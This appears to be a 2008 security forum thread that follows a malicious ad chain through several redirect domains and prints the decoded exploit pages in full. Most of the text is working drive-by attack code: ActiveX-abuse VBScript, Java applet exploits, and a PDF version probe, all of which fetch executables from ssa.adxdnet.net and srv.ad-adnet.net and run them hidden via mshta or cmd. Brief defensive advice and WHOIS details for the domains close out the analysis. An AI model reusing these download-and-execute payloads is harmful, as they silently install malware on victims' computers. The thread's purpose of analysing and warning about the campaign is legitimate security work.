try { var a = new ActiveXObject(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){}
// "WScript.Shell"
if(a) { try { a.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, aobj, eloc

if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"4f%75%74%"+"6c%6f%6f%6b%2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
// "Outlook.Application"
if VarType(cobj) <> vbObject Then Set cobj = CreateObject(Unescape("%"+"57%4d%49%53%63%72%"+"69%70%74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32"))
// "WMIScriptUtils.WMIObjectBroker2"

Set wobj = cobj.CreateObject(Unescape("%"+"57%63%"+"72%69%70%74%2e%53%68%65%6c%6c"))
// "Wcript.Shell"
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%"+"69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))
// "Scripting.FileSystemObject"
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%42%2e%"+"53%74%72%65%61%6d"))
// "ADODB.Stream"

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%6f%"+"73%6f%66%74%2e%58%4d%4c%48%54%54%50"))
// "Microsoft.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%"+"58%4d%4c%32%2e%58%4d%4c%48%54%54%50"))
// "MSXML2.XMLHTTP"

eloc = sobj.GetSpecialFolder(2) & Chr(92) & target

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.Send: response = xobj.ResponseBody
   aobj.Type = 1: aobj.Mode = 3: aobj.Open
   aobj.Write response
   aobj.SaveToFile eloc, 2
   aobj.Close
End If

wobj.run eloc, 0
End Function

Call DownExAxObj("http://ssa.adxdnet.net/xrun.exe", "xrun.exe")
Call DownExAxObj("http://ssa.adxdnet.net/xpre.exe", "xpre.exe")

</script>

ssa.adxdnet.net/code/smain.php?scout=jvcxeng

CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }

} // End Else Not IE

function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://ssa.adxdnet.net/xrun.exe;http://ssa.adxdnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>

ssa.adxdnet.net/code/smain.php?scout=objmsit

No code present at the time of the writeup.

CODE
<script language="javascript">

</script>

In the code above we notice a reference to srun.php also.

ssa.adxdnet.net/code/srun.php

CODE
<script language="javascript">try{window.moveTo(-3000,-3000);} catch(e){window.close();}</script>
<hta:application showintaskbar="no" windowstate="normal">

<script language="VBScript">
on error resume next
Self.MoveTo 3300, 3300

Function DownloadExecute(source, target)
on error resume next
Dim wobj, eobj, sobj, xobj, aobj, eloc, tfold, tfile, binstring, response, i

Set eobj = CreateObject(Unescape("%"+"53%68%65%6c%6c%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e"))
// "Shell.Application"
Set sobj = CreateObject(Unescape("%"+"53%63%72%69%"+"70%74%69%6e%67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"))
// "Scripting.FileSystemObject"

If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"57%69%6e%48%74%"+"74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"))
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"57%69%"+"6e%48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"))
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"4d%53%58%4d%4c%32%"+"2e%58%4d%4c%48%54%54%50"))
// "MSXML2.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = CreateObject(Unescape("%"+"4d%69%63%72%6f%73%"+"6f%66%74%2e%58%4d%4c%48%54%54%50"))
// "Microsoft.XMLHTTP"

Set tfold = sobj.GetSpecialFolder(2)
eloc = tfold & Chr(92) & target

If sobj.FileExists(eloc) = False Then
   xobj.Open "GET", source, False
   xobj.setRequestHeader "Request", "srun"
   xobj.Send
   response = xobj.ResponseText
  
  
    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 5000
    
    sp = 1
    If ss > sn Then sp = FormatNumber((ss / sn), 0) + 1
    ReDim sd(sp), bd(sp)
    
    For i = 0 To sp
       sd(i) = Mid(response, (i*sn)+1, sn)
    
       For x = 1 To Len(sd(i)) Step 2
       bd(i) = bd(i) & Chr(Clng("&H" & Mid(sd(i), x, 2)))
       Next
    
       binstring = binstring & bd(i)
    Next
            
   If Len(binstring) > 1 And InStr(LCase(binstring), "<html>") = 0 Then
   Set tfile = tfold.CreateTextFile(target)
   tfile.Write binstring
   tfile.Close
   End If
End If

If sobj.FileExists(eloc) Then eobj.ShellExecute eloc, "", "", "open", 0
End Function

Function InvDownloadExecute()
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=xpre", "xpre.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=prun", "prun.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=wavvsnet", "wavvsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=snapsnet", "snapsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=rasesnet", "rasesnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=eeevsnet", "eeevsnet.exe")
Call DownloadExecute("http://ssa.adxdnet.net/get.php?src=winvsnet", "winvsnet.exe")

Self.Close
End Function

Call window.setTimeout("InvDownloadExecute", 360000, "VBScript")
</script>

As you will have noticed, the bad guys experiement a huge amount of vulnerabilities to get their junk on your PC. Keep Windows, Java, Office, WMP ... and applications updated ! Secure your browser, whether you use Internet Explorer, FireFox or Opera.

<h4>
IP details
</h4>
espads.net - 85.17.162.100

Website Title: Index of /
ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-08-21
Expires: 2009-08-21
Updated: 2008-08-21
Name Server: NS1.DOMAINSERVICE.COM (has 403,408 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Location - Noord-holland - Amsterdam - Leaseweb

Whois Record
Domain Name: ESPADS.NET

Registrant [1495550]:
Moniker, Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

hostnames sharing ip with a-records
  1. *.adrefer.net
  2. *.adxdnet.net
  3. *.kasdfps.net
  4. ad.adrefer.net
  5. adrefer.net
  6. adxcnet.net
  7. adxdnet.net
  8. awltovhc.net
  9. espads.net
  10. especialads.com
  11. ikwlkad.net
  12. iwdjiamk.net
  13. kasdfps.net
  14. kiafjwo.net
  15. netcrefer.net
  16. ssa.adxdnet.net
  17. tqlkg.net
Kimberly
Nov 14 2008, 06:42 PM
<h4>
Starting point at Clicksor
</h4>
creative.clicksor.com/network_1020/498/c212999415.html

CODE
<script language="javascript" src="http://ads.adsrefer.net/serve/servecst?atype=b2&pid=[*]"></script>

CODE
GET /serve/servecst?atype=b2&pid=[*] HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/network_1020/498/c212999415.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adsrefer.net
Proxy-Connection: Keep-Alive
The page leads to:

CODE
document.location.href='http://ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]'

<h4>
ads.adsrefer.net
</h4>
ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]

For a change the page isn't encrypted and we easily obtain the details.

CODE
<script type="text/javascript" language="javascript" src="http://www.awltovhc.net/placeholder-1225937-2033172771?atype=b2&pid=118627"></script>
<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=154982" width="1" height="1" frameborder="0"></iframe>
</body></html>
  1. adsecxnet.ws/document/banner?type=1&pid=[snip] returns a 404 error.

    CODE
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /data.php was not found on this server.</p>
    <hr>
    <address>Apache Server at adsecxnet.ws Port 80</address>
    </body></html>

  2. www.awltovhc.net/placeholder-1225937-2033172771?atype=b2&pid=[snip] decoded:

    CODE
    <a href="http://www.jdoqocy.com/click-2406336-10416079" target="_top"><img src="http://www.ftjcfx.com/image-2406336-10416079" width="160" height="600" alt="RF Online US Eshop Link" border="0"/></a><script language="javascript" src="http://www.kasdfps.net/placeholder-1163731-2033191062"></script>
<h4>
www.awltovhc.net
</h4>
  1. www.jdoqocy.com/click-2406336-10416079 - click target.
  2. www.ftjcfx.com/image-2406336-10416079

    CODE
    The URL has moved <a href="http://www.yceml.net/0975/10416079-3.gif">here</a>

    Banner to be displayed: www.yceml.net/0975/10416079-3.gif

    IPB Image

  3. Link to www.kasdfps.net
<h4>
www.kasdfps.net
</h4>
CODE
GET /placeholder-1163731-2033191062 HTTP/1.1
Accept: */*
Referer: http://ads.adsrefer.net/serve/showcst?atype=b2&pid=[*]&cid=[*]&tid=[*]
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.kasdfps.net
Proxy-Connection: Keep-Alive

The script once decoded, shows a PDF exploit (which are seen more and more) and 4 iframes:
CODE
<script language="javascript">
var pdfrd, pdfrv, pobj;

var nsplugad = navigator.plugins["Adobe Acrobat"];
if(nsplugad && nsplugad.description.indexOf("Version") == -1) {
pdfrd = true;
}

if(!pdfrd) { try {
var pobj = document.createElement("object");
pobj.classid = "clsid:CA8A9780-280D-11CF-A24D-444553540000";
if(pobj.readyState != 0) {
try { pdfrv = pobj.getversions().indexOf("Form=8"); }catch(e){}
if(pdfrv) { pdfrd = true; }
}
} catch(e) {} }

if(!pdfrd && window.ActiveXObject) {
try { pobj = new ActiveXObject("AcroPDF.PDF"); }catch(e){}
try { pdfrv = pobj.getversions().indexOf("Form=8"); }catch(e){}
if(pdfrv) { pdfrd = true; }
}

if(pdfrd) {
document.write('<iframe src="http://adsecxnet.ws/document/banner?type=1&pid=154982" frameborder="0" style="width:1px;height:1px;"></iframe>');
}
</script>

<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://srv.ad-adnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>
All the pages at srv.ad-adnet.net contain obfuscated scripts. Below is their content once decoded.

srv.ad-adnet.net/code/smain.php?scout=acxcrds

CODE
<script language="VBScript">
on error resume next

Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, eobj, sobj, tfld, eloc, tfile, response, bindata, i, x

Set cobj = document.createElement("object")
cobj.setAttribute "classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest.5.1","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("Microsoft.XMLHTTP","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("MSXML2.XMLHTTP","")
Set eobj = cobj.CreateObject("Shell.Application","")
Set sobj = cobj.CreateObject("Scripting.FileSystemObject","")

If VarType(xobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then

    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

If sobj.FileExists(eloc) Then
If VarType(eobj) = vbObject Then
eobj.ShellExecute "cmd", " /c start """" """ & eloc & """", "", "open", 0
Else wobj.run "cmd /c start """" """ & eloc & """", 0
End If
End If

End If
End Function

Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=d1", "aswcxwxxsm")
Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=xrun", "aewcoorwsx")
Call DownExRdsDsc("http://srv.ad-adnet.net/get?src=xpre", "weoaxrroow")
</script>

srv.ad-adnet.net/code/smain.php?scout=acxcobj

CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); }catch(e){} }
if(a) { try { var b = a.CreateObject("WScript.Shell",""); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:AB9BCEDD-EC7E-47E1-9322-D4A210617116"); }catch(e){} }
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", "clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8"); }catch(e){} }
if(a) { try { a.RunApplication(1, "mshta http://srv.ad-adnet.net/code/srun", 1); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("TxCtx.TransactionContext"); }catch(e){}
if(a) { try { var b = a.CreateInstance("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("WMIScriptUtils.WMIObjectBroker2"); }catch(e){}
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject("Outlook.Application"); }catch(e){}
if(a) { try { var b = a.CreateObject("WScript.Shell"); }catch(e){} }
if(b) { try { b.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }

var a = false;
try { var a = new ActiveXObject("WScript.Shell"); }catch(e){}
if(a) { try { a.run("mshta http://srv.ad-adnet.net/code/srun", 0); }catch(e){} }
</script>

<script language="VBScript">
on error resume next

Function DownExAxObj(source, target)
on error resume next
Dim cobj, wobj, eobj, sobj, xobj, tfld, eloc, tfile, response, bindata, i, x

if VarType(cobj) <> vbObject Then Set cobj = CreateObject("Outlook.Application")
if VarType(cobj) <> vbObject Then Set cobj = CreateObject("WMIScriptUtils.WMIObjectBroker2")

Set wobj = cobj.CreateObject("WScript.Shell")
Set sobj = cobj.CreateObject("Scripting.FileSystemObject")

If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest.5.1","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("WinHttp.WinHttpRequest","")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("Microsoft.XMLHTTP")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject("MSXML2.XMLHTTP")

xobj.Open "GET", source, False
xobj.setRequestHeader "Request", "smain"
xobj.Send
response = xobj.responseText

If Len(response) > 1 And InStr(LCase(response), "<html>") = 0 Then

Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target & ".tmp")

If sobj.FileExists(eloc) = False Then
    
    Set tfile = sobj.CreateTextFile(eloc, True)

    Dim ss, sn, sp, sd(), bd()
    ss = Len(response)
    sn = 10000
    
    sp = Int(ss / sn)
    ReDim sd(sp), bd(sp)

    For i = 0 To sp
        sd(i) = Mid(response, (i*sn)+1, sn)
        For x = 1 To Len(sd(i)) Step 2
        bd(i) = bd(i) & Chr("&H" & Mid(sd(i), x, 2))
        Next
        tfile.Write bd(i)
    Next

    tfile.Close
End If

End If

wobj.run "cmd /c start """" """ & eloc & """", 0
End Function

Call DownExAxObj("http://srv.ad-adnet.net/get?src=xrun", "ecewxnsree")
Call DownExAxObj("http://srv.ad-adnet.net/get?src=xpre", "oamnxewsmx")
</script>

srv.ad-adnet.net/code/smain.php?scout=jvcxeng

CODE
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
      
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);

//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
